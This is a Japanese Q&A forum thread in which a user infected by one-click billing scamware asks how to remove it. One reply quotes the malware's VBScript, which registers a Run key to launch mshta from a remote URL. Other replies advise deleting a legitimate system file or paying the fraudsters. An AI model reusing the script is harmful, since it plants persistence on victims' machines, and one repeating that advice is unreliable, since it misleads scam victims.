「変態愛好家」というサイトに登録してしまいました。。。

「変態愛好家」というサイトに登録してしまいました。。。

当方まったく変態愛好家ではないのですが、ネットサーフィンしていて興味本位でクリックしてしまったサイトに登録してしまったことになってしまい、高額な請求をされています。

普段ならこのまま放置で大丈夫なんですが、この「変態愛好家」さん、デスクトップに恥ずかしい広告（というか請求？）を張り付けたままにしているんですよ。

一人暮らしで人に見られることもないのでそういう心配はないのですが単純に邪魔です。
ぶっちゃけ支払いすることも含めて早急に引っぺがしたいのです。

できるだけお金は払いたくないので他の方法で対処したいのですが問題点として。。。

１、利用することに承諾するチェックを入れてしまった
２、利用規約にクリックした時点で登録され、課金が発生することが明記してある
３、困ったことに欲しかった動画が本当に見れてしまった

というわけで法外な請求は別として欲しいものが手に入ったし、自分で承諾している形なので支払う義務があるんじゃないかと思いまして。

皆さんのご意見をお聞きしてから対策したいと思いますので是非知恵を貸していただきたいです。

ベストアンサー kyo_kasiwazaki 回答No.8

最良の解決方法は支払って2度と同じ過ちを繰り返さないことだと思います。
お金払えばちゃんと広告は消えてくれるはずなので。

それで消えなければ完全な悪質サイトです。

サイトを見てないのでどれだけの金額を請求されているのかわかりませんので金額にもよると思いますが、僕は"対策のフリーソフトを使ってPCが起動できない状態"になったことがあります。

PCが壊れたことを考えると支払った方がはるかにお得でした。。。

もちろんPCに詳しい方に相談できるのでしたらそれからでもいいとは思うのですが、2次被害にあった僕のような人もいるのでそういう可能性も考えてみてください。

お礼 2010/05/24 16:56

支払ったら広告は消えてくれました。

おっしゃる通り、それでPCが壊れたら何倍もの損をすることになるので授業料だと思ってます。

まあ金銭的にはそこまで問題ではないのですが、PCに侵入されたのが気分悪いです。

これからしっかり気をつけてネットやろうと思います。

ttt8300 回答No.9

>>１、利用することに承諾するチェックを入れてしまった
>>２、利用規約にクリックした時点で登録され、課金が発生することが明記してある

動画ファイルをダウンロードさせると思わせて、「htaワンクリックウェア」をダウンロードさせるワンクリックウェアサイトである認識はありますか？

1.私は20歳以上で、今現在使っているパソコンは自分のもので他人や会社のものではありません。
はい いいえ

2.ダウンロードページに進むには、錯誤が無いようにサイトの利用規約に必ず同意した上で進みます。
はい いいえ

3.私は上記確認と利用規約に同意したうえで、動画ページへ進みます。

上記の作業を２回くり返し、動画ページに移動しています。

動画ページでサムネイルをクリックすると、動画ファイルをダウンロードさせると思わせて、「htaワンクリックウェア」をダウンロードするダイアログが出てきて、何も知らないあなたは実行をクリック・・・はい、感染。

>>自分で承諾している形なので支払う義務があるんじゃないかと思いまして。

有料番組利用契約申込みボタンが何処にもありません。

あるのは、「1.私は20歳以上で、今現在使っているパソコンは自分のもので他人や会社のものではありません。はい いいえ」と「2.ダウンロードページに進むには、錯誤が無いようにサイトの利用規約に必ず同意した上で進みます。はい いいえ」、「3.私は上記確認と利用規約に同意したうえで、動画ページへ進みます。」

というものだけです。

これが、まともな契約行為だと言うのですか？

インターネット通販における「意に反して契約の申込みをさせようとする行為」に係るガイドラインについて

http://www.meti.go.jp/policy/economy/consumer/consumer/tokutei/ecrule/guideline.htm

「顧客の意に反して契約の申込みをさせようとする行為」の具体的内容

http://www.meti.go.jp/policy/economy/consumer/consumer/tokutei/ecrule/order.htm

契約を申し込んでいないのですから、支払い義務もありません。

お礼 2010/05/24 16:53

回答ありがとうございました！

しかしながら法的な問題云々もそうなんですけど、それよりも変なプログラムが一度入り込んだという事実がいやですよね。

実際似たようなプログラムにPC破壊されたりすることもあるので、今回は授業料だと思って支払いました。PC壊れたらその何倍も損することになるので。
支払いと同時に広告も消えましたが、これもこれでなんかいやな感じです。。。

二度と引っかからないように気をつけたいと思います。

qwerjpo 回答No.7

すみません、調べたら確かにシステムファイルだったようです。

http://internet.watch.impress.co.jp/cda/news/2009/04/09/23089.html

危ない危ない。
誤った情報を流してしまってすみませんでした。

参考URL：

http://internet.watch.impress.co.jp/cda/news/2009/04/09/23089.html

morimu 回答No.6

NO.5さんの回答で
それと、できれば本体のファイル「c:\Windows \system32\mshta.exe」を削除しておいた方が良いです。

ですがmahta.exeはマイクロソフトの正規の
ファイルなので削除してはいけません。
正規ファイルを使ってエロエロな画面を
出しているんです。

qwerjpo 回答No.5

すみません。再度トライしてみたらIEでサーバに接続させたときにレジストリにスタートアップが登録されるようになっていました。

以下パケットキャプチャから取得した情報から抜粋

<Script Language="VBScript">
On Error Resume Next

winwidth = 600
winheight = 400

window.resizeTo winwidth, winheight

positionX = ( screen.availWidth - winwidth ) / 2
positionY = ( screen.availHeight - winheight ) / 2

window.moveTo positionX, positionY

Dim WshShell
Set WshShell = CreateObject( "WScript.Shell" )

Dim WindowsDirectory
WindowsDirectory = WshShell.ExpandEnvironmentStrings( "%SystemRoot%" )

WshShell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start_0d3851411c3a681fadd058efe2d95ecef336cf7a", WindowsDirectory & "\system32\mshta http://www.**-******-**.net/pc/page/player_view.php?code=&cuid=0d3851411c3a681fadd058efe2d95ecef336cf7a", "REG_SZ"
WshShell.Run "wmplayer.exe http://www.**-******-**.net/movie/sample_1.wmv", 4, False

Window.Open "http://www.**-******-**.net/pc/page/allot.php?code=&cuid=0d3851411c3a681fadd058efe2d95ecef336cf7a&ckg=on&ln=/movie_list"

</Script>

なので、このレジストリキーを削除してみてください。たぶんもう起動しなくなると思います。
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start_0d3851411c3a681fadd058efe2d95ecef336cf7a

それと、できれば本体のファイル「c:\Windows\system32\mshta.exe」を削除しておいた方が良いです。

qwerjpo 回答No.4

自分で探してダウンロードしてあえて感染させて調べてみました。

結論：リカバリ

これは僕のスキルでは全部解析するの無理。orz

実際に動かしているのにKasperskyは検知しないし、
大元のファイルをVirusTotalでやってもどれも検知しないし。
これはかなり詳しい方でなければ修復するのは難しいのでリカバリをおすすめします。

回答No.3

以下のソフトでスタートアップをチェックしてみましょう。
怪しいのがあれば無効化。
プロセス調べて同じ物があれば強制終了。

[参考]Vector：スタートアップチェッカー - お勧めソフトPickUP
http://www.vector.co.jp/vpack/browse/pickup/pw7/pw007026.html

入れておくと、次回から同じような手口でやられそうになっても、スタートアップに登録された時点で警告してくれます。

qwerjpo 回答No.2

とりあえず請求はほっとく。
どーせ個人の情報なんか知り得ないんだし。

で、問題の広告ですが、何かしらスタートアップに登録されているはずなので、
Autorunsなどで最近追加されたスタートアップをしらべてみてはどうでしょう？

どうしても分からなければURLを教えてください。
こちらで調べますので。

akasiyaoyaji 回答No.1

支払い警告画面が数分おきに出る!!
そういう方はいませんか？

どうやらワンクリウェア（スパイウェア）が侵入したみたいですね。
早急にパソコンのチェック及びワンクリウェアの削除を行うべきでしょう。

対応サイトであれば、以下の物も使えます。（自己責任でお使い下さい）
ワンクリウェア駆除ツール(test版)更新停止中
http://sasi40dx.cs.land.to/
［ダウンロードはここをクリック]でダウンロードが始まります。 保存されたファイルをダブルクリックして自己解凍後、作成された「del_1cw」フォルダ内の「del_1cw.bat」をダブルクリックします。あとは画面指示に従って［ダイアログ］をクリックしていけばOKです。
※　削除する際、ＰＣの知識がある程度ありませんと大切なデータを破壊する恐れがあります。
自分で出来そうに無い時は、ＰＣに精通した友人・知人に頼むか、最寄りパソコンショップの有料出張修理サービス等を利用・お願いするか、購入先に問い合わせるのも良いでしょう。

PC知識がお有りでしたら上で紹介したサイトに移動して、参考になさって下さい。

なお、システムの復元を奨める方がいらっしゃるようですが、実はかえってパソコンを不安定にしたり、おかしくなったりする危険性が指摘されていますので、私は奨めません。

システムの復元の危険性
http://pasofaq.jp/windows/admintools/rstrui.htm

私が初めてワンクリック詐欺に遭った時、まず真っ先に契約しているプロバイダへ相談しました。（本当にＩＰアドレスから個人特定が可能なのか？支払う必要があるのか？など質問）
その後、相談掲示板を発見し、自分と似たような相談が無いのか？を確認しましたら同じ物があり、その中身を見ましたが、「果たしてその回答は正しいのか？」と疑問に感じたので最寄りの消費者センターに「自分の足で」行き「面談で」相談し、ようやく理解することができました。
ですから、わざわざ新規で相談せずに済みました。

「自分は特別なのか？」と、思いがちですがそんな事はありません。
私の他の相談者への回答を見れば解かりますが、ほとんど同じ回答をしております。
サイト名で判断せずに手口で判断しましょう。
そうしませんと、再度ワンクリに掛かり、同じような質問を繰り返すことに。
不安なのは理解できますが、まずは落ち着いて彼方此方の相談サイトを調べたり、プロバイダに確認したり携帯電話で被害に遭ったのであれば携帯電話会社に相談するなりして自分で調べる努力を。ネットの掲示板で見ず知らずの人から言われるよりも「説得力」「安心感」が違います。
また、慌てすぎてそういった方法すら思い付かない人に、公的機関やプロバイダ・携帯電話会社へ相談するように奨めるのも我々アドバイザーの仕事の１つであると私は思います。
公的機関などに聞くのが1番安心出来ることでしょう。